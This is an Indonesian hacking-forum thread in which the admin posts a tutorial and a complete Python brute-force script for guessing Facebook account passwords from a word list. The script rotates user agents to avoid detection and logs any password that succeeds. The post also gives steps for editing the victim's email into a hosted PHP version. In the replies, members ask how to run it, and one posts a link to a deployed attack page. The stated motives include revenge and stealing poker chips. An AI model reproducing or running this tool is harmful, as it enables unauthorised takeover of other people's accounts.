Cyber HackinG™ | Komunitas Forum Indonesia
CYBER HACKING™

© 2009-2013

==========================================

Selamat datang di forum

Cyber HackinG™

FREE Forum, Download Center, Aplikasi, Softwares, Handphone, Smartphone, PC, Trick and Tips & Trick Internet Gratis TELKOMSEL, TSEL FB, INDOSAT, THREE AXIS, XL, SMARTFREEN dll.

Silahkan REGISTER Dahulu.

=========================================


Perlu di Ingat bahwa MEMBER diharuskan

LOGIN
untuk mengunduh kontent didalam forum, dan untuk melihat image yg ada.

Contact Email : ch.indoforum@gmail.com

============================================
Copyright © Cyber HackinG™ 2009-2013.




FREE Forum, Download Center, Aplikasi, Softwares, Handphone, Smartphone, PC, Trick and Tips & Trick Internet Gratis TELKOMSEL, TSEL FB, INDOSAT, THREE, AXIS, XL, SMARTFREEN dll.
 
IndeksCalendarFAQPendaftaranLogin

Share | 
 

 Implementasi Facebook hac*k*ing Dengan Dictionary Attack Bruteforce

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
Aditya89
Admin
Admin



PostSubyek: Implementasi Facebook hac*k*ing Dengan Dictionary Attack Bruteforce   Fri Jul 01 2011, 12:51

Facebook, ? iya sapa yg tidak kenal dengan situs jejaring sosial ini. Ga punya account tetapi setidaknya pernah dengar nama ini bukan ).
Jejaring Sosial ini mungkin salah satu fenomena di beberapa tahun belakangan ini setelah pendahulunya friendster. Nah sebagai situs pertemanan, situs jejaring sosial ini tidak luput dari ke isengan tangan2 jahil, motifnya pun beragam, mulai dari isengin pemiliknya, revenge, sakit hati, dan yg paling parah adalah karena dengan motif buat nyari CHIPS POKER (nah lo, ngaku aja lo pada )

Berbagai teknik telah banyak beredar di kalangan underground, teknik nya pun beragam, mulai dari teknik phis*ing (fake login ), maupun keylogger hanya dengan tujuan untuk mendapatkan account pribadi targetnya.

ok, cukup basa basinya rel.....to the point aja deh
sebelumnya kita musti bikin persiapan dolo, ibarat mo perang senjata harus lengkap ....
yg musti disiapin sebagai berikut

1. Musti punya server atau hosting (gratis/ bayar) buat upload and nyimpen script 2 berikut.
-Facebook BruteForce Script
-Simple Dictionary Attack

buat yg kesulitan download file yg Simple Dictionary Attack bisa copas script ini :
Code:
#!/usr/bin/python
# This is facebook bruteforcer tools
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will not be responsible for any damage !!
# Toolname : facebookbruteforcer.py
# Programmer : Gunslinger_
# Version : 1.0
# Date : Tue Jul 27 13:24:44 WIT 2010
# Special thanks to mywisdom to inspire me

import re
import os
import sys
import random
import warnings
import time
try:
import mechanize
except ImportError:
print "[*] Please install mechanize python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
import cookielib
except ImportError:
print "[*] Please install cookielib python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)

warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)

# define variable
__programmer__ = "gunslinger_ "
__version__ = "1.0"
verbose = False
useproxy = False
usepassproxy = False
log = 'fbbruteforcer.log'
file = open(log, "a")
success = 'http://www.facebook.com/?sk=messages&ref=mb'
fblogin = 'https://login.facebook.com/login.php?login_attempt=1'
# some cheating ..
ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
'Microsoft Internet Explorer/4.0b1 (Windows 95)',
'Opera/8.00 (Windows NT 5.1; U; en)',
'amaya/9.51 libwww/5.4.0',
'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 [You must be registered and logged in to see this link.])',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
]
facebook = '''
__ _ _
/ _| | | | |
| |_ __ _ ___ ___| |__ ___ ___ | | __
| _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
| || (_| | (_| __/ |_) | (_) | (_) | <
|_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\
bruteforcer...

Programmer : %s
Version : %s''' % (__programmer__, __version__)
option = '''
Usage : %s [options]
Option : -u, --username | User for bruteforcing
-w, --wordlist | Wordlist used for bruteforcing
-v, --verbose | Set %s will be verbose
-p, --proxy | Set http proxy will be use
-k, --usernameproxy | Set username at proxy will be use
-i, --passproxy | Set password at proxy will be use
-l, --log | Specify output filename (default : fbbruteforcer.log)
-h, --help | Print this help

Example : %s -u [You must be registered and logged in to see this link.] -w wordlist.txt"

P.S : add "&" to run in the background
''' % (sys.argv[0], sys.argv[0], sys.argv[0])
hme = '''
Usage : %s [option]
-h or --help for get help
''' % sys.argv[0]

def helpme():
print facebook
print option
file.write(facebook)
file.write(option)
sys.exit(1)

def helpmee():
print facebook
print hme
file.write(facebook)
file.write(hme)
sys.exit(1)

for arg in sys.argv:
try:
if arg.lower() == '-u' or arg.lower() == '--user':
username = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-l' or arg.lower() == '--log':
log = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-p' or arg.lower() == '--proxy':
useproxy = True
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-k' or arg.lower() == '--userproxy':
usepassproxy = True
usw = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-i' or arg.lower() == '--passproxy':
usepassproxy = True
usp = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-v' or arg.lower() == '--verbose':
verbose = True
elif arg.lower() == '-h' or arg.lower() == '--help':
helpme()
elif len(sys.argv) <= 1:
helpmee()
except IOError:
helpme()
except NameError:
helpme()
except IndexError:
helpme()

def bruteforce(word):
try:
sys.stdout.write("\r[*] Trying %s... " % word)
file.write("[*] Trying %s\n" % word)
sys.stdout.flush()
br.addheaders = [('User-agent', random.choice(ouruseragent))]
opensite = br.open(fblogin)
br.select_form(nr=0)
br.form['email'] = username
br.form['pass'] = word
br.submit()
response = br.response().read()
if verbose:
print response
if success in response:
print "\n\n[*] Logging in success..."
print "[*] Username : %s" % (username)
print "[*] Password : %s\n" % (word)
file.write("\n[*] Logging in success...")
file.write("\n[*] Username : %s" % (username))
file.write("\n[*] Password : %s\n\n" % (word))
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
except mechanize._mechanize.FormNotFoundError:
print "\n[*] Facebook changing their system, please report bug at [You must be registered and logged in to see this link.]\n"
file.write("\n[*] Facebook changing their system, please report bug at [You must be registered and logged in to see this link.]\n")
sys.exit(1)
except mechanize._form.ControlNotFoundError:
print "\n[*] Facebook changing their system, please report bug at [You must be registered and logged in to see this link.]\n"
file.write("\n[*] Facebook changing their system, please report bug at [You must be registered and logged in to see this link.]\n")
sys.exit(1)

def releaser():
global word
for word in words:
bruteforce(word.replace("\n",""))

def main():
global br
global words
try:
br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_debug_http(False)
br.set_debug_redirects(False)
br.set_debug_redirects(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
if useproxy:
br.set_proxies({"http": proxy})
if usepassproxy:
br.add_proxy_password(usw, usp)
if verbose:
br.set_debug_http(True)
br.set_debug_redirects(True)
br.set_debug_redirects(True)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
preventstrokes = open(wordlist, "r")
words = preventstrokes.readlines()
count = 0
while count < len(words):
words[count] = words[count].strip()
count += 1
except IOError:
print "\n[*] Error: Check your wordlist path\n"
file.write("\n[*] Error: Check your wordlist path\n")
sys.exit(1)
except NameError:
helpme()
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
print facebook
print "\n[*] Starting attack at %s" % time.strftime("%X")
print "[*] Account for bruteforcing %s" % (username)
print "[*] Loaded :",len(words),"words"
print "[*] Bruteforcing, please wait..."
file.write(facebook)
file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
file.write("\n[*] Account for bruteforcing %s" % (username))
file.write("\n[*] Loaded : %d words" % int(len(words)))
file.write("\n[*] Bruteforcing, please wait...\n")
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
releaser()
bruteforce(word)
except NameError:
helpme()

if __name__ == '__main__':
main()

Nah, file itu adalah file utama yg harus disimpan ke dalam hostingan

2. Buat Dictionary Attack bisa qmu bikin tambah dan edit sendiri dari wordlist Dictionary ataw mungkin bisa cari yg lebih lengkap.

OK, persiapan telah selesai....saatnya ke medan perang......ga deng, maksudnya kita akan melakukan testing.
disini saya asumsikan lo pada udah punya hosting buat tempat naroh file-file tadi.
klo ga tau cara bikin hosting silahkan tanya ke google yah )

pada source code Facebook Dictionary attacknya kita edit dolo sebelom di upload
1.
Code:
set_time_limit(0);

kita ubah time limitnya menjadi gede misalnya 500 dan ini dalam hitungan detik hingga code itu menjadi
Code:
set_time_limit(500);

2.
Code:
$username ="brute@force.org";

// username korban misalnya [You must be registered and logged in to see this link.] hingga pada code menjadi
Code:
$username ="target@bego.com";

3.
Code:
$dictionary ="dictionary.txt";

adalah tempat dictionary attack kita. biasanya diletakkan dalam satu directory

Setelah Semuanya di Edit, upload ke Hostingan yg kamu punya, misalkan saya punya Hosting (orang) yg saya pakai untuk contoh ini saya upload ke dalam satu directory bernama fb.
Nah setelah kedua file tersebut sukses di upload dalam 1 direktory



setelah sukses, skr tinggal eksekusi tuh via eb address.
misalkan lo nyimpen di direktory /home/xxx.com/images/ maka eksekusi aja di [You must be registered and logged in to see this link.]

jika di eksekusi maka script akan mencoba membruteforce account milik target lo.



Jika dah selesai , maka log hasil bruteforce tadi akan tersimpan dengan nama cookie.txt. pada direktory yg sama . silahkan di analisa hasilnya....


And last word, thanks for you attention if u read a simple tutorial.


Regard

==================================================================
Didalam Forum Bukan Banyaknya Postingan Yg Anda Buat Berarti Bagus, Tapi Isi & Mutu Dari Postingan Yg Anda Buat
Kembali Ke Atas Go down
http://zonagratis.forumid.net
shoshuri
Moderators
Moderators



PostSubyek: Re: Implementasi Facebook hac*k*ing Dengan Dictionary Attack Bruteforce   Fri Jul 01 2011, 13:22

msh krang ngerti gan gmana cra pkenya?
Kembali Ke Atas Go down
http://shoshuri.co.cc
Aditya89
Admin
Admin



PostSubyek: Re: Implementasi Facebook hac*k*ing Dengan Dictionary Attack Bruteforce   Fri Jul 01 2011, 13:39

shoshuri wrote:
msh krang ngerti gan gmana cra pkenya?
hnya yg sering mainin berbasis pemograman yg bsa gan,

==================================================================
Didalam Forum Bukan Banyaknya Postingan Yg Anda Buat Berarti Bagus, Tapi Isi & Mutu Dari Postingan Yg Anda Buat
Kembali Ke Atas Go down
http://zonagratis.forumid.net
shoshuri
Moderators
Moderators



PostSubyek: Re: Implementasi Facebook hac*k*ing Dengan Dictionary Attack Bruteforce   Fri Jul 01 2011, 15:59

berarti hrus jago, vb, java script, css kayak yg gtuan yah gan?
Kembali Ke Atas Go down
http://shoshuri.co.cc
Aditya89
Admin
Admin



PostSubyek: Re: Implementasi Facebook hac*k*ing Dengan Dictionary Attack Bruteforce   Fri Jul 01 2011, 17:24

shoshuri wrote:
berarti hrus jago, vb, java script, css kayak yg gtuan yah gan?
yaph. . . Btul kang, nga ada yg nga bsa, klo blum dcoba. Kegagalan adalah kunci kesuksesan. Rajin2lah bertanya dan membaca.

==================================================================
Didalam Forum Bukan Banyaknya Postingan Yg Anda Buat Berarti Bagus, Tapi Isi & Mutu Dari Postingan Yg Anda Buat
Kembali Ke Atas Go down
http://zonagratis.forumid.net
shoshuri
Moderators
Moderators



PostSubyek: Re: Implementasi Facebook hac*k*ing Dengan Dictionary Attack Bruteforce   Fri Jul 01 2011, 18:14

ok mksh gan ane cba dlu lporan mnyusul.
Kembali Ke Atas Go down
http://shoshuri.co.cc
meswew
Super Moderators
Super Moderators



PostSubyek: Re: Implementasi Facebook hac*k*ing Dengan Dictionary Attack Bruteforce   Fri Jul 01 2011, 19:59

simple dictionary attack di copas di jadiin extensi apa gan ??

==================================================================
Kembali Ke Atas Go down
Aditya89
Admin
Admin



PostSubyek: Re: Implementasi Facebook hac*k*ing Dengan Dictionary Attack Bruteforce   Fri Jul 01 2011, 22:11

meswew wrote:
simple dictionary attack di copas di jadiin extensi apa gan ??
klo nga salah php gan. Mf klo slah nih jga hbis copas dri link forum luar, msh dlm tahap pembelajaran.

==================================================================
Didalam Forum Bukan Banyaknya Postingan Yg Anda Buat Berarti Bagus, Tapi Isi & Mutu Dari Postingan Yg Anda Buat
Kembali Ke Atas Go down
http://zonagratis.forumid.net
meswew
Super Moderators
Super Moderators



PostSubyek: Re: Implementasi Facebook hac*k*ing Dengan Dictionary Attack Bruteforce   Fri Jul 15 2011, 02:21

ith work tested tp msh btuh dictionary yg lebih luas lagi .share dong kang min,test :

Code:
http://tahuk*h-anda.cu.cc/Faceb**k/attack.php

==================================================================
Kembali Ke Atas Go down
banyul
NewBie
NewBie



PostSubyek: Re: Implementasi Facebook hac*k*ing Dengan Dictionary Attack Bruteforce   Wed Jul 27 2011, 15:28

harus upload ke hostingan dulu donk min???
Kembali Ke Atas Go down
agnyagony
Pendatang Baru
Pendatang Baru



PostSubyek: Re: Implementasi Facebook hac*k*ing Dengan Dictionary Attack Bruteforce   Fri Aug 19 2011, 00:34

gan , maksudnyaa Musti punya server atau hosting (gratis/ bayar) buat upload apaan ?
ga ngerti bantuin , mau belajar otodidak susah
Kembali Ke Atas Go down
cindeamano
Pendatang Baru
Pendatang Baru



PostSubyek: Re: Implementasi Facebook hac*k*ing Dengan Dictionary Attack Bruteforce   Sun Sep 25 2011, 16:54

Aditya89 wrote:

setelah sukses, skr tinggal eksekusi tuh via eb address.


Regard

eb adress? maksudnya FB kah?
kalau phissing kan nunggu target yang kejebak di fake logi yg kita bikin, tapi kalau trik yang ini apa kita sendiri yang langsung eksekusi tanpa harus nunggu?

Kembali Ke Atas Go down
kemping
Pendatang Baru
Pendatang Baru



PostSubyek: Re: Implementasi Facebook hac*k*ing Dengan Dictionary Attack Bruteforce   Sat Nov 26 2011, 23:33

keeeeeeeppp shear juragan tp ngk ngerti
Kembali Ke Atas Go down
nogo
Pendatang Baru
Pendatang Baru



PostSubyek: Re: Implementasi Facebook hac*k*ing Dengan Dictionary Attack Bruteforce   Fri Jan 04 2013, 21:57

ini masih bisa ga dipakai di fb sekarang?
Kembali Ke Atas Go down
antikonak
NewBie
NewBie



PostSubyek: Re: Implementasi Facebook hac*k*ing Dengan Dictionary Attack Bruteforce   Sun Feb 03 2013, 21:14

jd pengen nyoba....ane ke tkp dlu gan
Kembali Ke Atas Go down
Sponsored content




PostSubyek: Re: Implementasi Facebook hac*k*ing Dengan Dictionary Attack Bruteforce   Today at 09:09

Kembali Ke Atas Go down
 
Implementasi Facebook hac*k*ing Dengan Dictionary Attack Bruteforce
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Update Status Facebook via Blueberry, Telepon Umum, Wartel, Kantor Pos, HP Pinjaman, Warnet, Hati
» bercanda dengan LOGIKA
» bedanya ninja 250 dengan ninja 250 se
» HELP!!! beda MOTUL 5100 dengan MOTUL H-TECH
» WTA-Bedanya pake Open Filter dengan Replacement Air Filter

Permissions in this forum:Anda tidak dapat menjawab topik
Cyber HackinG™ | Komunitas Forum Indonesia :: ALL ABOUT PROGRAMMING :: HackinG Tutorial-
Navigasi: